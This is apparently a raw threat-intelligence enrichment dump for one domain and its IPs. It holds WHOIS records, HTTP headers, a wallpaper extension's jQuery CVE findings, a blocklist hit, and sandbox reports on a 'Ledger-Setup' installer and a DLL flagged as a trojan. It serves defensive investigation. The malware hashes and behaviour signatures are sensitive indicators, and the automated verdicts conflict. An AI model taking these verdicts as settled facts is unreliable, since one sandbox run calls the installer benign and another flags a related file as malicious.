of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +49.2283296859 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: zerotwo-best-waifu.online Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-01-11T15:03:40.00Z Creation Date: 2021-12-25T22:42:00.00Z Registrar Registration Expiration Date: 2022-12-25T23:59:59.00Z Registrar: ENOM, INC. Registrar IANA ID: 48 Domain Status: ok https://www.icann.org/epp#ok Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Paris Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/0b66922f-87a6-44e9-a979-1158d3dacd13 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTP://WDPRS.INTERNIC.NET/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 2022-12-18 00:21:30 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.190.129 2022-12-18 00:24:07 Affiliate - Email Address No E-Mail Address Extractor 0 0 2 0 None support@newtabwallpaperstheme.com [{"platform": "Chrome", "version": "0.3", "data": {"webstore": {"website": "", "rating": 5, "privacy_policy": "http://newtabwallpaperstheme.com/privacy", "last_updated": "2018-12-03", "name": "Plague Doctor Wallpapers Theme New Tab", "price": "", "offered_by": "newtabwallpaperstheme.com", "support_site": "", "version": "", "address": "", "short_description": "Plague Doctor Wallpapers for chrome new tabs", "permission_warnings": ["Your data on mail.google.com, google.com, and 2 other websites", "Your list of installed apps, extensions, and themes"], "users": 133, "size": "8.39MiB", "type": "Extension", "email": "support@newtabwallpaperstheme.com", "rating_users": 1, "icon": "https://lh3.googleusercontent.com/jGCoOssgGzBDnKcOK5LkF0fwWeX1BylKw01UYZaFRgkD09i-S4kSHLKYe31O0UauMzuXf3NPyw=w128-h128-e365"}, "extcalls": ["https://chrome.google.com/webstore/detail/", "https://www.facebook.com/sharer/sharer.php?u=", "https://plus.google.com/share?url=", "http://www.twitter.com/share?url=", "https://pinterest.com/pin/create/bookmarklet/?url=", "https://www.tumblr.com/widgets/share/tool?canonicalUrl=", "http://vk.com/share.php?url=", "http://newtabwallpaperstheme.com/privacy", "https://mail.google.com/mail/feed/atom", "https://www.google.com/", "http://newtabwallpaperstheme.com/search?q={searchTerms}", "https://www.facebook.com/", "https://www.google.com/s2/favicons?domain="], "retire": [{"results": [{"detection": "filecontent", "vulnerabilities": [{"info": ["https://github.com/jquery/jquery/issues/2432", "http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/", "https://nvd.nist.gov/vuln/detail/CVE-2015-9251", "http://research.insecurelabs.org/jquery/test/"], "identifiers": {"CVE": ["CVE-2015-9251"], "issue": "2432", "summary": "3rd party CORS request may execute"}, "severity": "medium"}, {"info": ["https://bugs.jquery.com/ticket/11974", "https://nvd.nist.gov/vuln/detail/CVE-2015-9251", "http://research.insecurelabs.org/jquery/test/"], "identifiers": {"CVE": ["CVE-2015-9251"], "issue": "11974", "summary": "parseHTML() executes scripts in event handlers"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/", "https://nvd.nist.gov/vuln/detail/CVE-2019-11358", "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b"], "identifiers": {"CVE": ["CVE-2019-11358"], "summary": "jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"], "identifiers": {"CVE": ["CVE-2020-11022"], "summary": "Regex in its jQuery.htmlPrefilter sometimes may introduce XSS"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"], "identifiers": {"CVE": ["CVE-2020-11023"], "summary": "Regex in its jQuery.htmlPrefilter sometimes may introduce XSS"}, "severity": "medium"}], "version": "2.1.1", "component": "jquery"}], "file": "/tmp/mlbijjeimhmdbdomoalcpnelmlfjjclj_0.3/start/js/libs/jquery.min.js"}], "related": {"fnenbhacmjcbgjpldpmmpdkggbnnpdpg": {"rating": 4.9411764, "users": 1000, "platform": "", "short_description": "Replace your new tab with the Fortnite Skins Custom page, with bookmarks, apps, games and Fortnite pride wallpaper.", "icon": "https://lh3.googleusercontent.com/FBZStTgtgrVsKJY-43dOx_pmL4MN0Lh8pmsJbarYjRUXxFrhvMIUATUvpKAzyACcrzIX_O8Ct79IIJowIj7tlaMxQw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 17, "name": "Fortnite Skin Wallpaper HD New Tab Background"}, "mbnpofpbcpmigidknilkmpaiiddbpbmd": {"rating": 2.6052632, "users": 2000, "platform": "", "short_description": "Kakashi Hatake wallpapers extension offers great images with every new tab and was made for all fans of Kakashi Hatake.", "icon": "https://lh3.googleusercontent.com/4LeqGrjYaPJReoG-V7jG-z9o3mfPJ5j7b-fmoCDc26yyHv34DmPuEWUO7Bi92dYN_VOTd9aIw9cZbbcTbzPSKneAHeU=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 76, "name": "Kakashi Hatake HD Wallpaper New Tab"}, "knmhcfocgkhpdpdhepdgafamhkgkmkpo": {"rating": 4.0833335, "users": 4000, "platform": "", "short_description": "Give a clean and modern look to your default Chrome homepage", "icon": "https://lh3.googleusercontent.com/NLTW94zaXi7LutyVLF4VOuHavdLRTLh5Lw2MlJ8Pdl9WYRnJpAXb-KHnfa_K1TH4FpGXaPHHWA=w128-h128-e365", "rating_users": 36, "name": "The Predator New Tab"}, "mplmbihfomdmohbhcgaigdmdldaiabnm": {"rating": 4.8846154, "users": 2000, "platform": "", "short_description": "Replace your new tab with the Fortnite Game Custom page, with bookmarks, apps, games and Fortnite pride wallpaper.", "icon": "https://lh3.googleusercontent.com/Ct1i0v2sVwduqEpRFYB-e18MEstG-1_uOexfPBH2avrQnImMKwYj7oWMBEoSQcKy9poGv-y_39bGG-79zYuyHK2iwxw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 26, "name": "Cool Fortnite Game Wallpaper HD New Tab"}, "nhaddphigjpecpkbppakcolcbchdlgnm": {"rating": 2.8396947, "users": 10000, "platform": "", "short_description": "Experience a new tab with breathtaking wallpapers and a personal dashboard that focus on your every day.", "icon": "https://lh3.googleusercontent.com/WRcBqIMMdZGcJAB-hhI0BoARoWxLDlTOAoeiPnlwMHNdCbpl6NeSCDFFzN30giPr-0DfKZGw=w128-h128-e365", "rating_users": 131, "name": "Crystal Dashboard - Chrome Startpage"}, "egopeokecbgdiiofbemdgbofafjepang": {"rating": 4.4764705, "users": 20000, "platform": "", "short_description": "Turn on dark theme on new tab. Enable night mode on browser home page.", "icon": "https://lh3.googleusercontent.com/7fPNQV7YTIi95SyC1w6nAXUTdpVk2TGm_5SC2uu5t7GwA_AzHUSznBwbjF1NA1ApH2t86AxTxxS1FUEULa3jpllJ7Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 170, "name": "Dark theme for new tab page"}, "meffljleomgifbbcffejnmhjagncfpbd": {"rating": 4.455157, "users": 200000, "platform": "", "short_description": "Reinvent Chrome Startpage with Infinite. Power up the new tab with Apps, Messengers, Games, Google & Apple Services", "icon": "https://lh3.googleusercontent.com/CA2-PN58mtwC0UnV1wltuL0Sgykvw-g8ex8uUb-3i1IxYSkgrAsA-K0-n7EhBYtfCl8qbwtAGRopXaYqcq4gy8DCig=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1338, "name": "Infinite Dashboard - New Tab like no other"}, "onjloafnnfndgpkdojhbhcebkpilfehi": {"rating": 2.1551895, "users": 10000, "platform": "", "short_description": "Install Fortnite HD Wallpapers New Tab Theme and get HD images of Fortnite characters with every new tab - outlanders, commandos..", "icon": "https://lh3.googleusercontent.com/qLSbMvAsI6u1718k8hzXYi7hz27iR5-6-wdYZ5go_PwVQOpDiW5_B9w1r3UlKWhGZh8YJG4gV9mX1eDL5-srhllXEg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2004, "name": "Fortnite HD Wallpapers New Tab Theme"}, "mmnicimdhohdpihiooibiclhbkddhjim": {"rating": 4.971338, "users": 10000, "platform": "", "short_description": "Cool 3D Backgrounds For A Stylish Home Screen!", "icon": "https://lh3.googleusercontent.com/vE05gDN0DCGYytkjx_VDFEh-K_GBJGLDMePvjdmQXwHLzI-R3sliHRa5Z5Hlo8WGN9tpmi8W7g=w128-h128-e365", "rating_users": 314, "name": "3D New Tab Wallpapers"}, "mncnjkognaelokhaogbplbajchofmjje": {"rating": 4.751773, "users": 20000, "platform": "", "short_description": "Get Pink Hd Wallpapers With Minigames Date And Time Add Ons", "icon": "https://lh3.googleusercontent.com/dgYRfqXFQXLaN6djZTARW-mu8hDbfy6-3ARAhmlaZIuZldrOwk7DLeUe4GymiXxnxj1ImifoiVk=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 423, "name": "Pink Tab HD Themes"}, "oiegmjnjcjanadhmfebiafogkhmlfllm": {"rating": 3.2666667, "users": 20000, "platform": "", "short_description": "Download all images from a website. Easily save photos from Instagram, Facebook, Pinterest, Google Images and other website.", "icon": "https://lh3.googleusercontent.com/O037nyE7ukNJ5iZXYe2qY1twLrqm05QgShmBWd65JWJ1NRGaMwj9cCwZ7gEHfSFEDuFMp7TCFoWcvqYZif1HuBYLlYU=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 30, "name": "Image Photo Downloader"}, "ogllliimbhgmclkgjldeffhjbhaenapo": {"rating": 4.2580166, "users": 38556, "platform": "", "short_description": "Modern New Tab Page replaces the traditional new tab page by a new beautiful and elegant one, made of customizable live tiles.", "icon": "https://lh3.googleusercontent.com/UFrRX-_vDHOo7_UrdyNio2_guR0EnXgUFffcxJPZhaqZHj8EEOh-RpbuzfJ_bzLArM06Q8hdIg=w128-h128-e365", "rating_users": 1341, "name": "Modern New Tab Page"}, "edjlmaphlhecmhhdgfooaiknmiiokhbe": {"rating": 4.882353, "users": 3000, "platform": "", "short_description": "Replace your new tab with the XXXTentacion Custom page, with bookmarks, apps, games and XXXTentacion wallpaper.", "icon": "https://lh3.googleusercontent.com/iTtrSQ19v--i4xFMwmNKmgJukVnAXaMsn0SbXP5zyFUaglnAbU0W6fdl8BkjbZrQ9-6mduJEO_kH7xxQrYGfgkIjrA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 51, "name": "XXXTentacion 4K Wallpapers New Tab"}, "lgecddhfcfhlmllljooldkbbijdcnlpe": {"rating": 4.1487455, "users": 100000, "platform": "", "short_description": "Give a clean and modern look to your default Chrome homepage", "icon": "https://lh3.googleusercontent.com/onrwvPDO6DBpE_PxtFRwEkRNZtWWAXKn12b0p4gemz93W-ICMOdRIDulMwGFA1YhvC0s02GnNxCsyPcknn2tnGly=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 558, "name": "Moment - #1 Personal Dashboard for Chrome"}, "ghabmoobnekiapiffifjdhgccbfbdgek": {"rating": 3.48, "users": 2000, "platform": "", "short_description": "The game features a map. We jumping into this map with a character we choose. We use a plane and parachute to jump.", "icon": "https://lh3.googleusercontent.com/1Bu9adHav1bGbuWBhJeu4kfPJBdLBVCAzWxwtM-v_ci7_s-pHSz8n183U1l43fcwW-LDJq0uWO3slInJjRWFMY5ToA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 25, "name": "PUBG Craft Battlegrounds Game New Tab"}, "mafmbfcmgifkdahieiddfiebgaabkdpd": {"rating": 3.787234, "users": 10000, "platform": "", "short_description": "Personalize your start page page with Speed Dial! Get custom backgrounds, layouts and tiles for your homepage.", "icon": "https://lh3.googleusercontent.com/VYkhN1MR_iQ_dnplc7_Q9jXzGbtrNuCfJi9Mq4E0reFT1ldgoQDg0ngWSugA99kgeIiMqBUJ=w128-h128-e365", "rating_users": 47, "name": "Speed Dial - New Tab Page"}, "opfnlonakpalmeppgacdllkpindpnfhf": {"rating": 4.6136365, "users": 2000, "platform": "", "short_description": "Get a lot of Razer Wallpapers for chromes new tab", "icon": "https://l 2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77ae3c3c5dd7e20a-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.1 2022-12-18 00:09:33 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.11:443 188.114.96.0/24 2022-12-18 00:10:04 Linked URL - Internal No URLScan.io 2 0 1 0 None http://rasputain.fr/ rasputain.fr 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None redwood (Net ID: 00:01:38:85:C1:F8) 37.780462,-122.390564 2022-12-18 00:07:11 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 3, u'search_terms': [{u'id': u'host', u'value': u'172.67.169.215'}], u'result': [{u'environment_id': 160, u'job_id': u'6398dde020bd5b786756929c', u'analysis_start_time': u'2022-12-13 20:17:45', u'vx_family': None, u'av_detect': u'4', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'Ledger-Setup_x86x64.exe', u'sha256': u'0f4aabac03b26d11ff91368f614b418e47891a908f4d8208fa0d360fef777a83', u'type': None, u'type_short': u'exe', u'size': 60883177}, {u'environment_id': 160, u'job_id': u'6398c973944b077d78332cc5', u'analysis_start_time': u'2022-12-13 18:50:41', u'vx_family': u'VHO:Trojan.MSIL.Exnet', u'av_detect': u'7', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'consolemeta.dll', u'sha256': u'aa606b7c7930a60ad0b6c3c830ef846c06bfa6edf26801d6e13b50ab3f7eaa00', u'type': None, u'type_short': u'exe', u'size': 60883177}, {u'environment_id': 100, u'job_id': u'61bcecd63f6824169173051f', u'analysis_start_time': u'2021-12-17 20:02:33', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'89e57cdb4dfb46a380e0a5d49f8c9b10150a0df2251c5a123f1d503456c08739', u'type': None, u'type_short': u'url', u'size': 39}]} 172.67.169.215 2022-12-18 00:20:44 Malicious IP on Same Subnet Yes CINS Army List 0 0 2 0 None cinsscore.com [20.192.0.0/10] http://cinsscore.com/list/ci-badguys.txt 20.192.0.0/10 2022-12-18 00:12:13 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.96.1', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} 188.114.96.1 2022-12-18 00:07:13 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 2, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'Ledger-Setup_x86x64.exe', u'signatures': [{u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-17', u'name': u'Accesses System Certificates Settings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"Ledger-Setup_x86x64.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\FLIGHTROOT\\CERTIFICATES"; Key: "9C0B252A678A087FBEE496A44377F7556AC605E7")\n "Ledger-Setup_x86x64.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES"; Key: "9C0B252A678A087FBEE496A44377F7556AC605E7")\n "Ledger-Setup_x86x64.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES"; Key: "B1BC968BD4F49D622AA89A81F2150152A41D829C")\n "Ledger-Setup_x86x64.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\B1BC968BD4F49D622AA89A81F2150152A41D829C"; Key: "BLOB")\n "Ledger-Setup_x86x64.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES"; Key: "B1BC968BD4F49D622AA89A81F2150152A41D829C")\n "Ledger-Setup_x86x64.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES"; Key: "08745487E891C19E3078C1F2A07E452950EF36F6")\n "Ledger-Setup_x86x64.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\FLIGHTROOT\\CERTIFICATES"; Key: "08745487E891C19E3078C1F2A07E452950EF36F6")\n "Ledger-Setup_x86x64.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES"; Key: "08745487E891C19E3078C1F2A07E452950EF36F6")\n "Ledger-Setup_x86x64.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES"; Key: "08745487E891C19E3078C1F2A07E452950EF36F6")\n "Ledger-Setup_x86x64.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES"; Key: "9C0B252A678A087FBEE496A44377F7556AC605E7")\n "Ledger-Setup_x86x64.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES"; Key: "9C0B252A678A087FBEE496A44377F7556AC605E7")\n "Ledger-Setup_x86x64.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE"; Key: "DISALLOWEDCERTSYNCDELTATIME")\n "Ledger-Setup_x86x64.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")\n "Ledger-Setup_x86x64.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT"; Key: "")'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-125', u'name': u'PE file has a big raw size section', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 0, u'description': u'Raw size of ".text" is "0x2b2e00" greater than 0x100000\n Raw size of ".text" is "0x33d400" greater than 0x100000\n Raw size of ".text" is "0x37f800" greater than 0x100000\n Raw size of ".text" is "0x211e00" greater than 0x100000'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-120', u'name': u'Contains registry location strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\AutoExclusionList"\n "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug"\n "SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\DebugApplications"\n "SOFTWARE\\Policies\\Microsoft\\Windows\\Windows Error Reporting\\DebugApplications"\n "SOFTWARE\\Classes\\"\n "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0"\n "SOFTWARE\\dotnet"\n "Software\\Microsoft\\Windows\\CurrentVersion"'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-80', u'name': u'PE file contains executable sections', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"elevate.exe" has an executable section named ".text"\n "nsProcess.dll" has an executable section named ".text"\n "libGLESv2.dll" has an executable section named ".text"\n "libEGL.dll" has an executable section named ".text"\n "nsDialogs.dll" has an executable section named ".text"\n "d3dcompiler_47.dll" has an executable section named ".text"\n "vulkan-1.dll" has an executable section named ".text"\n "nsis7z.dll" has an executable section named ".text"\n "ledger.exe" has an executable section named ".text"\n "Uninstall Ledger Live.exe" has an executable section named ".text"\n "vk_swiftshader.dll" has an executable section named ".text"\n "UAC.dll" has an executable section named ".text"\n "StdUtils.dll" has an executable section named ".text"\n "ffmpeg.dll" has an executable section named ".text"\n "System.dll" has an executable section named ".text"\n "WinShell.dll" has an executable section named ".text"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"65.8.158.62:49728"\n "172.67.169.215:49729"'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-124', u'name': u'PE file has a big virtual size section', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 0, u'description': u'Virtual size of ".text" is "0x2b2c16" greater than 0x100000\n Virtual size of ".text" is "0x33d244" greater than 0x100000\n Virtual size of ".ndata" is "0x184000" greater than 0x100000\n Virtual size of ".ndata" is "0x134000" greater than 0x100000\n Virtual size of ".text" is "0x37f6e6" greater than 0x100000\n Virtual size of ".text" is "0x211df6" greater than 0x100000\n Virtual size of ".data" is "0x15e198" greater than 0x100000'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"AcquireSRWLockExclusive" (Indicator: "AcquireSRWLockExclusive")\n "ReleaseSRWLockExclusive" (Indicator: "ReleaseSRWLockExclusive")\n "SleepConditionVariableCS" (Indicator: "Sleep")\n "WakeAllConditionVariable" (Indicator: "WakeAllConditionVariable")\n "FlsGetValue" (Indicator: "FlsGetValue")\n "FlsSetValue" (Indicator: "FlsSetValue")\n "InitializeCriticalSectionEx" (Indicator: "InitializeCriticalSection")\n "already connected" (Indicator: "connect")\n "connection aborted" (Indicator: "connect")\n "connection already in progress" (Indicator: "connect")\n "connection refused" (Indicator: "connect")\n "connection reset" (Indicator: "connect")\n "not a socket" (Indicator: "socket")\n "not connected" (Indicator: "connect")\n "too many files open in system" (Indicator: "open")\n "too many files open" (Indicator: "open")\n "CreateThreadpoolTimer" (Indicator: "CreateThread")\n "CreateThreadpoolWait" (Indicator: "CreateThread")\n "FreeLibraryWhenCallbackReturns" (Indicator: "FreeLibrary")\n "GetTickCount64" (Indicator: "GetTickCount")'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-7', u'name': u'Contains PDB pathways', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"D:\\a\\_work\\1\\s\\artifacts\\obj\\coreclr\\windows.x86.Release\\Corehost.Static\\singlefilehost.pdb"'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-79', u'name': u'Contains ability to dynamically determine API calls', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'Found GetProcAddress() and LoadLibraryA() in an import section (Source: nsProcess.dll)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: libGLESv2.dll)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: libEGL.dll)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: vulkan-1.dll)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: UAC.dll)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: WinShell.dll)'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-128', u'name': u'Calls an API typically used to create a process', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 6, u'description': u'"Ledger-Setup_x86x64.exe" called "CreateProcessW" with parameter ""%TEMP%\\ledger.exe"" - (UID: 00000000-00006304)'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-95', u'name': u'PE file contains writable sections', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"elevate.exe" has an writable section named ".data"\n "nsProcess.dll" has an writable section named ".data"\n "libGLESv2.dll" has an writable section named ".data"\n "libGLESv2.dll" has an writable section named ".tls"\n "libEGL.dll" has an writable section named ".data"\n "libEGL.dll" has an writable section named ".tls"\n "nsDialogs.dll" has an writable section named ".data"\n "d3dcompiler_47.dll" has an writable section named ".data"\n "vulkan-1.dll" has an writable section named ".data"\n "vulkan-1.dll" has an writable section named 